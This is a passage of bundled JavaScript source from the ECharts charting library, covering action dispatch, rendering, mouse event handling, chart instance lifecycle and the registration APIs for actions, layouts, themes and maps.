disposedWarning(this.id);\n        return;\n    }\n\n    if (!isObject(opt)) {\n        opt = {silent: !!opt};\n    }\n\n    if (!actions[payload.type]) {\n        return;\n    }\n\n    // Avoid dispatch action before setOption. Especially in `connect`.\n    if (!this._model) {\n        return;\n    }\n\n    // May dispatchAction in rendering procedure\n    if (this[IN_MAIN_PROCESS]) {\n        this._pendingActions.push(payload);\n        return;\n    }\n\n    doDispatchAction.call(this, payload, opt.silent);\n\n    if (opt.flush) {\n        this._zr.flush(true);\n    }\n    else if (opt.flush !== false && env$1.browser.weChat) {\n        // In WeChat embeded browser, `requestAnimationFrame` and `setInterval`\n        // hang when sliding page (on touch event), which cause that zr does not\n        // refresh util user interaction finished, which is not expected.\n        // But `dispatchAction` may be called too frequently when pan on touch\n        // screen, which impacts performance if do not throttle them.\n        this._throttledZrFlush();\n    }\n\n    flushPendingActions.call(this, opt.silent);\n\n    triggerUpdatedEvent.call(this, opt.silent);\n};\n\nfunction doDispatchAction(payload, silent) {\n    var payloadType = payload.type;\n    var escapeConnect = payload.escapeConnect;\n    var actionWrap = actions[payloadType];\n    var actionInfo = actionWrap.actionInfo;\n\n    var cptType = (actionInfo.update || 'update').split(':');\n    var updateMethod = cptType.pop();\n    cptType = cptType[0] != null && parseClassType(cptType[0]);\n\n    this[IN_MAIN_PROCESS] = true;\n\n    var payloads = [payload];\n    var batched = false;\n    // Batch action\n    if (payload.batch) {\n        batched = true;\n        payloads = map(payload.batch, function (item) {\n            item = defaults(extend({}, item), payload);\n            item.batch = null;\n            return item;\n        });\n    }\n\n    var eventObjBatch = [];\n    var eventObj;\n    var isHighDown = payloadType === 'highlight' || payloadType === 'downplay';\n\n    each(payloads, function (batchItem) {\n        // Action can specify the event by return it.\n        eventObj = actionWrap.action(batchItem, this._model, this._api);\n        // Emit event outside\n        eventObj = eventObj || extend({}, batchItem);\n        // Convert type to eventType\n        eventObj.type = actionInfo.event || eventObj.type;\n        eventObjBatch.push(eventObj);\n\n        // light update does not perform data process, layout and visual.\n        if (isHighDown) {\n            // method, payload, mainType, subType\n            updateDirectly(this, updateMethod, batchItem, 'series');\n        }\n        else if (cptType) {\n            updateDirectly(this, updateMethod, batchItem, cptType.main, cptType.sub);\n        }\n    }, this);\n\n    if (updateMethod !== 'none' && !isHighDown && !cptType) {\n        // Still dirty\n        if (this[OPTION_UPDATED]) {\n            // FIXME Pass payload ?\n            prepare(this);\n            updateMethods.update.call(this, payload);\n            this[OPTION_UPDATED] = false;\n        }\n        else {\n            updateMethods[updateMethod].call(this, payload);\n        }\n    }\n\n    // Follow the rule of action batch\n    if (batched) {\n        eventObj = {\n            type: actionInfo.event || payloadType,\n            escapeConnect: escapeConnect,\n            batch: eventObjBatch\n        };\n    }\n    else {\n        eventObj = eventObjBatch[0];\n    }\n\n    this[IN_MAIN_PROCESS] = false;\n\n    !silent && this._messageCenter.trigger(eventObj.type, eventObj);\n}\n\nfunction flushPendingActions(silent) {\n    var pendingActions = this._pendingActions;\n    while (pendingActions.length) {\n        var payload = pendingActions.shift();\n        doDispatchAction.call(this, payload, silent);\n    }\n}\n\nfunction triggerUpdatedEvent(silent) {\n    !silent && this.trigger('updated');\n}\n\n/**\n * Event `rendered` is triggered when zr\n * rendered. It is useful for realtime\n * snapshot (reflect animation).\n *\n * Event `finished` is triggered when:\n * (1) zrender rendering finished.\n * (2) initial animation finished.\n * (3) progressive rendering finished.\n * (4) no pending action.\n * (5) no delayed setOption needs to be processed.\n */\nfunction bindRenderedEvent(zr, ecIns) {\n    zr.on('rendered', function () {\n\n        ecIns.trigger('rendered');\n\n        // The `finished` event should not be triggered repeatly,\n        // so it should only be triggered when rendering indeed happend\n        // in zrender. (Consider the case that dipatchAction is keep\n        // triggering when mouse move).\n        if (\n            // Although zr is dirty if initial animation is not finished\n            // and this checking is called on frame, we also check\n            // animation finished for robustness.\n            zr.animation.isFinished()\n            && !ecIns[OPTION_UPDATED]\n            && !ecIns._scheduler.unfinished\n            && !ecIns._pendingActions.length\n        ) {\n            ecIns.trigger('finished');\n        }\n    });\n}\n\n/**\n * @param {Object} params\n * @param {number} params.seriesIndex\n * @param {Array|TypedArray} params.data\n */\nechartsProto.appendData = function (params) {\n    if (this._disposed) {\n        disposedWarning(this.id);\n        return;\n    }\n\n    var seriesIndex = params.seriesIndex;\n    var ecModel = this.getModel();\n    var seriesModel = ecModel.getSeriesByIndex(seriesIndex);\n\n    if (__DEV__) {\n        assert(params.data && seriesModel);\n    }\n\n    seriesModel.appendData(params);\n\n    // Note: `appendData` does not support that update extent of coordinate\n    // system, util some scenario require that. In the expected usage of\n    // `appendData`, the initial extent of coordinate system should better\n    // be fixed by axis `min`/`max` setting or initial data, otherwise if\n    // the extent changed while `appendData`, the location of the painted\n    // graphic elements have to be changed, which make the usage of\n    // `appendData` meaningless.\n\n    this._scheduler.unfinished = true;\n};\n\n/**\n * Register event\n * @method\n */\nechartsProto.on = createRegisterEventWithLowercaseName('on', false);\nechartsProto.off = createRegisterEventWithLowercaseName('off', false);\nechartsProto.one = createRegisterEventWithLowercaseName('one', false);\n\n/**\n * Prepare view instances of charts and components\n * @param  {module:echarts/model/Global} ecModel\n * @private\n */\nfunction prepareView(ecIns, type, ecModel, scheduler) {\n    var isComponent = type === 'component';\n    var viewList = isComponent ? ecIns._componentsViews : ecIns._chartsViews;\n    var viewMap = isComponent ? ecIns._componentsMap : ecIns._chartsMap;\n    var zr = ecIns._zr;\n    var api = ecIns._api;\n\n    for (var i = 0; i < viewList.length; i++) {\n        viewList[i].__alive = false;\n    }\n\n    isComponent\n        ? ecModel.eachComponent(function (componentType, model) {\n            componentType !== 'series' && doPrepare(model);\n        })\n        : ecModel.eachSeries(doPrepare);\n\n    function doPrepare(model) {\n        // Consider: id same and type changed.\n        var viewId = '_ec_' + model.id + '_' + model.type;\n        var view = viewMap[viewId];\n        if (!view) {\n            var classType = parseClassType(model.type);\n            var Clazz = isComponent\n                ? Component$1.getClass(classType.main, classType.sub)\n                : Chart.getClass(classType.sub);\n\n            if (__DEV__) {\n                assert(Clazz, classType.sub + ' does not exist.');\n            }\n\n            view = new Clazz();\n            view.init(ecModel, api);\n            viewMap[viewId] = view;\n            viewList.push(view);\n            zr.add(view.group);\n        }\n\n        model.__viewId = view.__id = viewId;\n        view.__alive = true;\n        view.__model = model;\n        view.group.__ecComponentInfo = {\n            mainType: model.mainType,\n            index: model.componentIndex\n        };\n        !isComponent && scheduler.prepareView(view, model, ecModel, api);\n    }\n\n    for (var i = 0; i < viewList.length;) {\n        var view = viewList[i];\n        if (!view.__alive) {\n            !isComponent && view.renderTask.dispose();\n            zr.remove(view.group);\n            view.dispose(ecModel, api);\n            viewList.splice(i, 1);\n            delete viewMap[view.__id];\n            view.__id = view.group.__ecComponentInfo = null;\n        }\n        else {\n            i++;\n        }\n    }\n}\n\n// /**\n//  * Encode visual infomation from data after data processing\n//  *\n//  * @param {module:echarts/model/Global} ecModel\n//  * @param {object} layout\n//  * @param {boolean} [layoutFilter] `true`: only layout,\n//  *                                 `false`: only not layout,\n//  *                                 `null`/`undefined`: all.\n//  * @param {string} taskBaseTag\n//  * @private\n//  */\n// function startVisualEncoding(ecIns, ecModel, api, payload, layoutFilter) {\n//     each(visualFuncs, function (visual, index) {\n//         var isLayout = visual.isLayout;\n//         if (layoutFilter == null\n//             || (layoutFilter === false && !isLayout)\n//             || (layoutFilter === true && isLayout)\n//         ) {\n//             visual.func(ecModel, api, payload);\n//         }\n//     });\n// }\n\nfunction clearColorPalette(ecModel) {\n    ecModel.clearColorPalette();\n    ecModel.eachSeries(function (seriesModel) {\n        seriesModel.clearColorPalette();\n    });\n}\n\nfunction render(ecIns, ecModel, api, payload) {\n\n    renderComponents(ecIns, ecModel, api, payload);\n\n    each(ecIns._chartsViews, function (chart) {\n        chart.__alive = false;\n    });\n\n    renderSeries(ecIns, ecModel, api, payload);\n\n    // Remove groups of unrendered charts\n    each(ecIns._chartsViews, function (chart) {\n        if (!chart.__alive) {\n            chart.remove(ecModel, api);\n        }\n    });\n}\n\nfunction renderComponents(ecIns, ecModel, api, payload, dirtyList) {\n    each(dirtyList || ecIns._componentsViews, function (componentView) {\n        var componentModel = componentView.__model;\n        componentView.render(componentModel, ecModel, api, payload);\n\n        updateZ(componentModel, componentView);\n    });\n}\n\n/**\n * Render each chart and component\n * @private\n */\nfunction renderSeries(ecIns, ecModel, api, payload, dirtyMap) {\n    // Render all charts\n    var scheduler = ecIns._scheduler;\n    var unfinished;\n    ecModel.eachSeries(function (seriesModel) {\n        var chartView = ecIns._chartsMap[seriesModel.__viewId];\n        chartView.__alive = true;\n\n        var renderTask = chartView.renderTask;\n        scheduler.updatePayload(renderTask, payload);\n\n        if (dirtyMap && dirtyMap.get(seriesModel.uid)) {\n            renderTask.dirty();\n        }\n\n        unfinished |= renderTask.perform(scheduler.getPerformArgs(renderTask));\n\n        chartView.group.silent = !!seriesModel.get('silent');\n\n        updateZ(seriesModel, chartView);\n\n        updateBlend(seriesModel, chartView);\n    });\n    scheduler.unfinished |= unfinished;\n\n    // If use hover layer\n    updateHoverLayerStatus(ecIns, ecModel);\n\n    // Add aria\n    aria(ecIns._zr.dom, ecModel);\n}\n\nfunction performPostUpdateFuncs(ecModel, api) {\n    each(postUpdateFuncs, function (func) {\n        func(ecModel, api);\n    });\n}\n\n\nvar MOUSE_EVENT_NAMES = [\n    'click', 'dblclick', 'mouseover', 'mouseout', 'mousemove',\n    'mousedown', 'mouseup', 'globalout', 'contextmenu'\n];\n\n/**\n * @private\n */\nechartsProto._initEvents = function () {\n    each(MOUSE_EVENT_NAMES, function (eveName) {\n        var handler = function (e) {\n            var ecModel = this.getModel();\n            var el = e.target;\n            var params;\n            var isGlobalOut = eveName === 'globalout';\n\n            // no e.target when 'globalout'.\n            if (isGlobalOut) {\n                params = {};\n            }\n            else if (el && el.dataIndex != null) {\n                var dataModel = el.dataModel || ecModel.getSeriesByIndex(el.seriesIndex);\n                params = dataModel && dataModel.getDataParams(el.dataIndex, el.dataType, el) || {};\n            }\n            // If element has custom eventData of components\n            else if (el && el.eventData) {\n                params = extend({}, el.eventData);\n            }\n\n            // Contract: if params prepared in mouse event,\n            // these properties must be specified:\n            // {\n            //    componentType: string (component main type)\n            //    componentIndex: number\n            // }\n            // Otherwise event query can not work.\n\n            if (params) {\n                var componentType = params.componentType;\n                var componentIndex = params.componentIndex;\n                // Special handling for historic reason: when trigger by\n                // markLine/markPoint/markArea, the componentType is\n                // 'markLine'/'markPoint'/'markArea', but we should better\n                // enable them to be queried by seriesIndex, since their\n                // option is set in each series.\n                if (componentType === 'markLine'\n                    || componentType === 'markPoint'\n                    || componentType === 'markArea'\n                ) {\n                    componentType = 'series';\n                    componentIndex = params.seriesIndex;\n                }\n                var model = componentType && componentIndex != null\n                    && ecModel.getComponent(componentType, componentIndex);\n                var view = model && this[\n                    model.mainType === 'series' ? '_chartsMap' : '_componentsMap'\n                ][model.__viewId];\n\n                if (__DEV__) {\n                    // `event.componentType` and `event[componentTpype + 'Index']` must not\n                    // be missed, otherwise there is no way to distinguish source component.\n                    // See `dataFormat.getDataParams`.\n                    if (!isGlobalOut && !(model && view)) {\n                        console.warn('model or view can not be found by params');\n                    }\n                }\n\n                params.event = e;\n                params.type = eveName;\n\n                this._ecEventProcessor.eventInfo = {\n                    targetEl: el,\n                    packedEvent: params,\n                    model: model,\n                    view: view\n                };\n\n                this.trigger(eveName, params);\n            }\n        };\n        // Consider that some component (like tooltip, brush, ...)\n        // register zr event handler, but user event handler might\n        // do anything, such as call `setOption` or `dispatchAction`,\n        // which probably update any of the content and probably\n        // cause problem if it is called previous other inner handlers.\n        handler.zrEventfulCallAtLast = true;\n        this._zr.on(eveName, handler, this);\n    }, this);\n\n    each(eventActionMap, function (actionType, eventType) {\n        this._messageCenter.on(eventType, function (event) {\n            this.trigger(eventType, event);\n        }, this);\n    }, this);\n};\n\n/**\n * @return {boolean}\n */\nechartsProto.isDisposed = function () {\n    return this._disposed;\n};\n\n/**\n * Clear\n */\nechartsProto.clear = function () {\n    if (this._disposed) {\n        disposedWarning(this.id);\n        return;\n    }\n    this.setOption({ series: [] }, true);\n};\n\n/**\n * Dispose instance\n */\nechartsProto.dispose = function () {\n    if (this._disposed) {\n        disposedWarning(this.id);\n        return;\n    }\n    this._disposed = true;\n\n    setAttribute(this.getDom(), DOM_ATTRIBUTE_KEY, '');\n\n    var api = this._api;\n    var ecModel = this._model;\n\n    each(this._componentsViews, function (component) {\n        component.dispose(ecModel, api);\n    });\n    each(this._chartsViews, function (chart) {\n        chart.dispose(ecModel, api);\n    });\n\n    // Dispose after all views disposed\n    this._zr.dispose();\n\n    delete instances[this.id];\n};\n\nmixin(ECharts, Eventful);\n\nfunction disposedWarning(id) {\n    if (__DEV__) {\n        console.warn('Instance ' + id + ' has been disposed');\n    }\n}\n\nfunction updateHoverLayerStatus(ecIns, ecModel) {\n    var zr = ecIns._zr;\n    var storage = zr.storage;\n    var elCount = 0;\n\n    storage.traverse(function (el) {\n        elCount++;\n    });\n\n    if (elCount > ecModel.get('hoverLayerThreshold') && !env$1.node) {\n        ecModel.eachSeries(function (seriesModel) {\n            if (seriesModel.preventUsingHoverLayer) {\n                return;\n            }\n            var chartView = ecIns._chartsMap[seriesModel.__viewId];\n            if (chartView.__alive) {\n                chartView.group.traverse(function (el) {\n                    // Don't switch back.\n                    el.useHoverLayer = true;\n                });\n            }\n        });\n    }\n}\n\n/**\n * Update chart progressive and blend.\n * @param {module:echarts/model/Series|module:echarts/model/Component} model\n * @param {module:echarts/view/Component|module:echarts/view/Chart} view\n */\nfunction updateBlend(seriesModel, chartView) {\n    var blendMode = seriesModel.get('blendMode') || null;\n    if (__DEV__) {\n        if (!env$1.canvasSupported && blendMode && blendMode !== 'source-over') {\n            console.warn('Only canvas support blendMode');\n        }\n    }\n    chartView.group.traverse(function (el) {\n        // FIXME marker and other components\n        if (!el.isGroup) {\n            // Only set if blendMode is changed. In case element is incremental and don't wan't to rerender.\n            if (el.style.blend !== blendMode) {\n                el.setStyle('blend', blendMode);\n            }\n        }\n        if (el.eachPendingDisplayable) {\n            el.eachPendingDisplayable(function (displayable) {\n                displayable.setStyle('blend', blendMode);\n            });\n        }\n    });\n}\n\n/**\n * @param {module:echarts/model/Series|module:echarts/model/Component} model\n * @param {module:echarts/view/Component|module:echarts/view/Chart} view\n */\nfunction updateZ(model, view) {\n    var z = model.get('z');\n    var zlevel = model.get('zlevel');\n    // Set z and zlevel\n    view.group.traverse(function (el) {\n        if (el.type !== 'group') {\n            z != null && (el.z = z);\n            zlevel != null && (el.zlevel = zlevel);\n        }\n    });\n}\n\nfunction createExtensionAPI(ecInstance) {\n    var coordSysMgr = ecInstance._coordSysMgr;\n    return extend(new ExtensionAPI(ecInstance), {\n        // Inject methods\n        getCoordinateSystems: bind(\n            coordSysMgr.getCoordinateSystems, coordSysMgr\n        ),\n        getComponentByElement: function (el) {\n            while (el) {\n                var modelInfo = el.__ecComponentInfo;\n                if (modelInfo != null) {\n                    return ecInstance._model.getComponent(modelInfo.mainType, modelInfo.index);\n                }\n                el = el.parent;\n            }\n        }\n    });\n}\n\n\n/**\n * @class\n * Usage of query:\n * `chart.on('click', query, handler);`\n * The `query` can be:\n * + The component type query string, only `mainType` or `mainType.subType`,\n *   like: 'xAxis', 'series', 'xAxis.category' or 'series.line'.\n * + The component query object, like:\n *   `{seriesIndex: 2}`, `{seriesName: 'xx'}`, `{seriesId: 'some'}`,\n *   `{xAxisIndex: 2}`, `{xAxisName: 'xx'}`, `{xAxisId: 'some'}`.\n * + The data query object, like:\n *   `{dataIndex: 123}`, `{dataType: 'link'}`, `{name: 'some'}`.\n * + The other query object (cmponent customized query), like:\n *   `{element: 'some'}` (only available in custom series).\n *\n * Caveat: If a prop in the `query` object is `null/undefined`, it is the\n * same as there is no such prop in the `query` object.\n */\nfunction EventProcessor() {\n    // These info required: targetEl, packedEvent, model, view\n    this.eventInfo;\n}\nEventProcessor.prototype = {\n    constructor: EventProcessor,\n\n    normalizeQuery: function (query) {\n        var cptQuery = {};\n        var dataQuery = {};\n        var otherQuery = {};\n\n        // `query` is `mainType` or `mainType.subType` of component.\n        if (isString(query)) {\n            var condCptType = parseClassType(query);\n            // `.main` and `.sub` may be ''.\n            cptQuery.mainType = condCptType.main || null;\n            cptQuery.subType = condCptType.sub || null;\n        }\n        // `query` is an object, convert to {mainType, index, name, id}.\n        else {\n            // `xxxIndex`, `xxxName`, `xxxId`, `name`, `dataIndex`, `dataType` is reserved,\n            // can not be used in `compomentModel.filterForExposedEvent`.\n            var suffixes = ['Index', 'Name', 'Id'];\n            var dataKeys = {name: 1, dataIndex: 1, dataType: 1};\n            each$1(query, function (val, key) {\n                var reserved = false;\n                for (var i = 0; i < suffixes.length; i++) {\n                    var propSuffix = suffixes[i];\n                    var suffixPos = key.lastIndexOf(propSuffix);\n                    if (suffixPos > 0 && suffixPos === key.length - propSuffix.length) {\n                        var mainType = key.slice(0, suffixPos);\n                        // Consider `dataIndex`.\n                        if (mainType !== 'data') {\n                            cptQuery.mainType = mainType;\n                            cptQuery[propSuffix.toLowerCase()] = val;\n                            reserved = true;\n                        }\n                    }\n                }\n                if (dataKeys.hasOwnProperty(key)) {\n                    dataQuery[key] = val;\n                    reserved = true;\n                }\n                if (!reserved) {\n                    otherQuery[key] = val;\n                }\n            });\n        }\n\n        return {\n            cptQuery: cptQuery,\n            dataQuery: dataQuery,\n            otherQuery: otherQuery\n        };\n    },\n\n    filter: function (eventType, query, args) {\n        // They should be assigned before each trigger call.\n        var eventInfo = this.eventInfo;\n\n        if (!eventInfo) {\n            return true;\n        }\n\n        var targetEl = eventInfo.targetEl;\n        var packedEvent = eventInfo.packedEvent;\n        var model = eventInfo.model;\n        var view = eventInfo.view;\n\n        // For event like 'globalout'.\n        if (!model || !view) {\n            return true;\n        }\n\n        var cptQuery = query.cptQuery;\n        var dataQuery = query.dataQuery;\n\n        return check(cptQuery, model, 'mainType')\n            && check(cptQuery, model, 'subType')\n            && check(cptQuery, model, 'index', 'componentIndex')\n            && check(cptQuery, model, 'name')\n            && check(cptQuery, model, 'id')\n            && check(dataQuery, packedEvent, 'name')\n            && check(dataQuery, packedEvent, 'dataIndex')\n            && check(dataQuery, packedEvent, 'dataType')\n            && (!view.filterForExposedEvent || view.filterForExposedEvent(\n                eventType, query.otherQuery, targetEl, packedEvent\n            ));\n\n        function check(query, host, prop, propOnHost) {\n            return query[prop] == null || host[propOnHost || prop] === query[prop];\n        }\n    },\n\n    afterTrigger: function () {\n        // Make sure the eventInfo wont be used in next trigger.\n        this.eventInfo = null;\n    }\n};\n\n\n/**\n * @type {Object} key: actionType.\n * @inner\n */\nvar actions = {};\n\n/**\n * Map eventType to actionType\n * @type {Object}\n */\nvar eventActionMap = {};\n\n/**\n * Data processor functions of each stage\n * @type {Array.<Object.<string, Function>>}\n * @inner\n */\nvar dataProcessorFuncs = [];\n\n/**\n * @type {Array.<Function>}\n * @inner\n */\nvar optionPreprocessorFuncs = [];\n\n/**\n * @type {Array.<Function>}\n * @inner\n */\nvar postUpdateFuncs = [];\n\n/**\n * Visual encoding functions of each stage\n * @type {Array.<Object.<string, Function>>}\n */\nvar visualFuncs = [];\n\n/**\n * Theme storage\n * @type {Object.<key, Object>}\n */\nvar themeStorage = {};\n/**\n * Loading effects\n */\nvar loadingEffects = {};\n\nvar instances = {};\nvar connectedGroups = {};\n\nvar idBase = new Date() - 0;\nvar groupIdBase = new Date() - 0;\nvar DOM_ATTRIBUTE_KEY = '_echarts_instance_';\n\nfunction enableConnect(chart) {\n    var STATUS_PENDING = 0;\n    var STATUS_UPDATING = 1;\n    var STATUS_UPDATED = 2;\n    var STATUS_KEY = '__connectUpdateStatus';\n\n    function updateConnectedChartsStatus(charts, status) {\n        for (var i = 0; i < charts.length; i++) {\n            var otherChart = charts[i];\n            otherChart[STATUS_KEY] = status;\n        }\n    }\n\n    each(eventActionMap, function (actionType, eventType) {\n        chart._messageCenter.on(eventType, function (event) {\n            if (connectedGroups[chart.group] && chart[STATUS_KEY] !== STATUS_PENDING) {\n                if (event && event.escapeConnect) {\n                    return;\n                }\n\n                var action = chart.makeActionFromEvent(event);\n                var otherCharts = [];\n\n                each(instances, function (otherChart) {\n                    if (otherChart !== chart && otherChart.group === chart.group) {\n                        otherCharts.push(otherChart);\n                    }\n                });\n\n                updateConnectedChartsStatus(otherCharts, STATUS_PENDING);\n                each(otherCharts, function (otherChart) {\n                    if (otherChart[STATUS_KEY] !== STATUS_UPDATING) {\n                        otherChart.dispatchAction(action);\n                    }\n                });\n                updateConnectedChartsStatus(otherCharts, STATUS_UPDATED);\n            }\n        });\n    });\n}\n\n/**\n * @param {HTMLElement} dom\n * @param {Object} [theme]\n * @param {Object} opts\n * @param {number} [opts.devicePixelRatio] Use window.devicePixelRatio by default\n * @param {string} [opts.renderer] Can choose 'canvas' or 'svg' to render the chart.\n * @param {number} [opts.width] Use clientWidth of the input `dom` by default.\n *                              Can be 'auto' (the same as null/undefined)\n * @param {number} [opts.height] Use clientHeight of the input `dom` by default.\n *                               Can be 'auto' (the same as null/undefined)\n */\nfunction init(dom, theme$$1, opts) {\n    if (__DEV__) {\n        // Check version\n        if ((version$1.replace('.', '') - 0) < (dependencies.zrender.replace('.', '') - 0)) {\n            throw new Error(\n                'zrender/src ' + version$1\n                + ' is too old for ECharts ' + version\n                + '. Current version need ZRender '\n                + dependencies.zrender + '+'\n            );\n        }\n\n        if (!dom) {\n            throw new Error('Initialize failed: invalid dom.');\n        }\n    }\n\n    var existInstance = getInstanceByDom(dom);\n    if (existInstance) {\n        if (__DEV__) {\n            console.warn('There is a chart instance already initialized on the dom.');\n        }\n        return existInstance;\n    }\n\n    if (__DEV__) {\n        if (isDom(dom)\n            && dom.nodeName.toUpperCase() !== 'CANVAS'\n            && (\n                (!dom.clientWidth && (!opts || opts.width == null))\n                || (!dom.clientHeight && (!opts || opts.height == null))\n            )\n        ) {\n            console.warn('Can\\'t get DOM width or height. Please check '\n            + 'dom.clientWidth and dom.clientHeight. They should not be 0.'\n            + 'For example, you may need to call this in the callback '\n            + 'of window.onload.');\n        }\n    }\n\n    var chart = new ECharts(dom, theme$$1, opts);\n    chart.id = 'ec_' + idBase++;\n    instances[chart.id] = chart;\n\n    setAttribute(dom, DOM_ATTRIBUTE_KEY, chart.id);\n\n    enableConnect(chart);\n\n    return chart;\n}\n\n/**\n * @return {string|Array.<module:echarts~ECharts>} groupId\n */\nfunction connect(groupId) {\n    // Is array of charts\n    if (isArray(groupId)) {\n        var charts = groupId;\n        groupId = null;\n        // If any chart has group\n        each(charts, function (chart) {\n            if (chart.group != null) {\n                groupId = chart.group;\n            }\n        });\n        groupId = groupId || ('g_' + groupIdBase++);\n        each(charts, function (chart) {\n            chart.group = groupId;\n        });\n    }\n    connectedGroups[groupId] = true;\n    return groupId;\n}\n\n/**\n * @DEPRECATED\n * @return {string} groupId\n */\nfunction disConnect(groupId) {\n    connectedGroups[groupId] = false;\n}\n\n/**\n * @return {string} groupId\n */\nvar disconnect = disConnect;\n\n/**\n * Dispose a chart instance\n * @param  {module:echarts~ECharts|HTMLDomElement|string} chart\n */\nfunction dispose(chart) {\n    if (typeof chart === 'string') {\n        chart = instances[chart];\n    }\n    else if (!(chart instanceof ECharts)) {\n        // Try to treat as dom\n        chart = getInstanceByDom(chart);\n    }\n    if ((chart instanceof ECharts) && !chart.isDisposed()) {\n        chart.dispose();\n    }\n}\n\n/**\n * @param  {HTMLElement} dom\n * @return {echarts~ECharts}\n */\nfunction getInstanceByDom(dom) {\n    return instances[getAttribute(dom, DOM_ATTRIBUTE_KEY)];\n}\n\n/**\n * @param {string} key\n * @return {echarts~ECharts}\n */\nfunction getInstanceById(key) {\n    return instances[key];\n}\n\n/**\n * Register theme\n */\nfunction registerTheme(name, theme$$1) {\n    themeStorage[name] = theme$$1;\n}\n\n/**\n * Register option preprocessor\n * @param {Function} preprocessorFunc\n */\nfunction registerPreprocessor(preprocessorFunc) {\n    optionPreprocessorFuncs.push(preprocessorFunc);\n}\n\n/**\n * @param {number} [priority=1000]\n * @param {Object|Function} processor\n */\nfunction registerProcessor(priority, processor) {\n    normalizeRegister(dataProcessorFuncs, priority, processor, PRIORITY_PROCESSOR_FILTER);\n}\n\n/**\n * Register postUpdater\n * @param {Function} postUpdateFunc\n */\nfunction registerPostUpdate(postUpdateFunc) {\n    postUpdateFuncs.push(postUpdateFunc);\n}\n\n/**\n * Usage:\n * registerAction('someAction', 'someEvent', function () { ... });\n * registerAction('someAction', function () { ... });\n * registerAction(\n *     {type: 'someAction', event: 'someEvent', update: 'updateView'},\n *     function () { ... }\n * );\n *\n * @param {(string|Object)} actionInfo\n * @param {string} actionInfo.type\n * @param {string} [actionInfo.event]\n * @param {string} [actionInfo.update]\n * @param {string} [eventName]\n * @param {Function} action\n */\nfunction registerAction(actionInfo, eventName, action) {\n    if (typeof eventName === 'function') {\n        action = eventName;\n        eventName = '';\n    }\n    var actionType = isObject(actionInfo)\n        ? actionInfo.type\n        : ([actionInfo, actionInfo = {\n            event: eventName\n        }][0]);\n\n    // Event name is all lowercase\n    actionInfo.event = (actionInfo.event || actionType).toLowerCase();\n    eventName = actionInfo.event;\n\n    // Validate action type and event name.\n    assert(ACTION_REG.test(actionType) && ACTION_REG.test(eventName));\n\n    if (!actions[actionType]) {\n        actions[actionType] = {action: action, actionInfo: actionInfo};\n    }\n    eventActionMap[eventName] = actionType;\n}\n\n/**\n * @param {string} type\n * @param {*} CoordinateSystem\n */\nfunction registerCoordinateSystem(type, CoordinateSystem$$1) {\n    CoordinateSystemManager.register(type, CoordinateSystem$$1);\n}\n\n/**\n * Get dimensions of specified coordinate system.\n * @param {string} type\n * @return {Array.<string|Object>}\n */\nfunction getCoordinateSystemDimensions(type) {\n    var coordSysCreator = CoordinateSystemManager.get(type);\n    if (coordSysCreator) {\n        return coordSysCreator.getDimensionsInfo\n                ? coordSysCreator.getDimensionsInfo()\n                : coordSysCreator.dimensions.slice();\n    }\n}\n\n/**\n * Layout is a special stage of visual encoding\n * Most visual encoding like color are common for different chart\n * But each chart has it's own layout algorithm\n *\n * @param {number} [priority=1000]\n * @param {Function} layoutTask\n */\nfunction registerLayout(priority, layoutTask) {\n    normalizeRegister(visualFuncs, priority, layoutTask, PRIORITY_VISUAL_LAYOUT, 'layout');\n}\n\n/**\n * @param {number} [priority=3000]\n * @param {module:echarts/stream/Task} visualTask\n */\nfunction registerVisual(priority, visualTask) {\n    normalizeRegister(visualFuncs, priority, visualTask, PRIORITY_VISUAL_CHART, 'visual');\n}\n\n/**\n * @param {Object|Function} fn: {seriesType, createOnAllSeries, performRawSeries, reset}\n */\nfunction normalizeRegister(targetList, priority, fn, defaultPriority, visualType) {\n    if (isFunction(priority) || isObject(priority)) {\n        fn = priority;\n        priority = defaultPriority;\n    }\n\n    if (__DEV__) {\n        if (isNaN(priority) || priority == null) {\n            throw new Error('Illegal priority');\n        }\n        // Check duplicate\n        each(targetList, function (wrap) {\n            assert(wrap.__raw !== fn);\n        });\n    }\n\n    var stageHandler = Scheduler.wrapStageHandler(fn, visualType);\n\n    stageHandler.__prio = priority;\n    stageHandler.__raw = fn;\n    targetList.push(stageHandler);\n\n    return stageHandler;\n}\n\n/**\n * @param {string} name\n */\nfunction registerLoading(name, loadingFx) {\n    loadingEffects[name] = loadingFx;\n}\n\n/**\n * @param {Object} opts\n * @param {string} [superClass]\n */\nfunction extendComponentModel(opts/*, superClass*/) {\n    // var Clazz = ComponentModel;\n    // if (superClass) {\n    //     var classType = parseClassType(superClass);\n    //     Clazz = ComponentModel.getClass(classType.main, classType.sub, true);\n    // }\n    return ComponentModel.extend(opts);\n}\n\n/**\n * @param {Object} opts\n * @param {string} [superClass]\n */\nfunction extendComponentView(opts/*, superClass*/) {\n    // var Clazz = ComponentView;\n    // if (superClass) {\n    //     var classType = parseClassType(superClass);\n    //     Clazz = ComponentView.getClass(classType.main, classType.sub, true);\n    // }\n    return Component$1.extend(opts);\n}\n\n/**\n * @param {Object} opts\n * @param {string} [superClass]\n */\nfunction extendSeriesModel(opts/*, superClass*/) {\n    // var Clazz = SeriesModel;\n    // if (superClass) {\n    //     superClass = 'series.' + superClass.replace('series.', '');\n    //     var classType = parseClassType(superClass);\n    //     Clazz = ComponentModel.getClass(classType.main, classType.sub, true);\n    // }\n    return SeriesModel.extend(opts);\n}\n\n/**\n * @param {Object} opts\n * @param {string} [superClass]\n */\nfunction extendChartView(opts/*, superClass*/) {\n    // var Clazz = ChartView;\n    // if (superClass) {\n    //     superClass = superClass.replace('series.', '');\n    //     var classType = parseClassType(superClass);\n    //     Clazz = ChartView.getClass(classType.main, true);\n    // }\n    return Chart.extend(opts);\n}\n\n/**\n * ZRender need a canvas context to do measureText.\n * But in node environment canvas may be created by node-canvas.\n * So we need to specify how to create a canvas instead of using document.createElement('canvas')\n *\n * Be careful of using it in the browser.\n *\n * @param {Function} creator\n * @example\n *     var Canvas = require('canvas');\n *     var echarts = require('echarts');\n *     echarts.setCanvasCreator(function () {\n *         // Small size is enough.\n *         return new Canvas(32, 32);\n *     });\n */\nfunction setCanvasCreator(creator) {\n    $override('createCanvas', creator);\n}\n\n/**\n * @param {string} mapName\n * @param {Array.<Object>|Object|string} geoJson\n * @param {Object} [specialAreas]\n *\n * @example GeoJSON\n *     $.get('USA.json', function (geoJson) {\n *         echarts.registerMap('USA', geoJson);\n *         // Or\n *         echarts.registerMap('USA', {\n *             geoJson: geoJson,\n *             specialAreas: {}\n *         })\n *     });\n *\n *     $.get('airport.svg', function (svg) {\n *         echarts.registerMap('airport', {\n *             svg: svg\n *         